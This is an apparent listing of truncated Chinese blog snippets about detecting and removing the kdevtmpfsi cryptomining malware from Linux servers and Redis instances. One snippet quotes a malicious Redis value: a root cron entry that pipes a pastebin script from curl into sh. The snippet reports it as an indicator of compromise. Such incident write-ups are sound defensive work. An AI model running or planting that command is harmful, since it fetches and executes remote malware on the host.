背景 新接手了个环境，同事交接时说这些机器中过挖矿病毒还没重装，我TM。。。 线上环境不好动，只能手动查杀了。 操作系统如下： 过程 ssh上去，ps -ef看到如下： 手动kill掉进程，很快会生成新的，猜测有守护进程。用STOP信号让它停止。 查看定时任务清理 ...

病毒名称：kdevtmpfsi 状态：CPU爆满，导致线上服务宕机。 图片是盗的，进程占用是真实的。 1、# top 查看cpu占用情况，找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat ...

概述： 9.4号临时接到通知让一个人去应急，第一次应急，比较虚，到客户那里了解了一下情况。主要现象是流量异常，CPU占用过高。 发现连接数超多-17779，然后在试图连接其他主机的22端口 发现异常进程，当初进行杀死之后，从九点到晚上十点cpu都是正常的，然后上午通过查看日志last ...

最近公司服务器上redis总是过几天就断一次，之前一直好好的，然后就上服务器上去看。一看发现内存占用变成92%，然后有两个cpu占用100%。使用top命令查看后，发现redis有两个进程占了很大资源，这两个进程就是kdevtmpfsi。 然后就开始百度，百度结果是先停止 ...

起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的，再看value我警觉了，这是要定时执行脚本啊。 分析 ...

　　　　背景：由于公司业务需要，职务由自动化测试，变更服务器后端开发。于是在网上购置了云服务器，写了一个简单的后台demo，部署在服务器上做测试。整个项目是以docker封装redis，mysql，dockerfile封装springboot项目，由于是个人做练习用服务器，基本没大流量情况，在项目 ...

发现CPU直接100% ...

服务器CPU占用100%，导致http请求无法进行top命令查看进程占用，发现kdevtmpfsi进程占用95%甚至更多netstat -natp 命令查看是否有异常陌生IP的TCP连接，查询到有来自国外的陌生IP，做了白名单处理 kdevtmpfsi进程解决办法 ...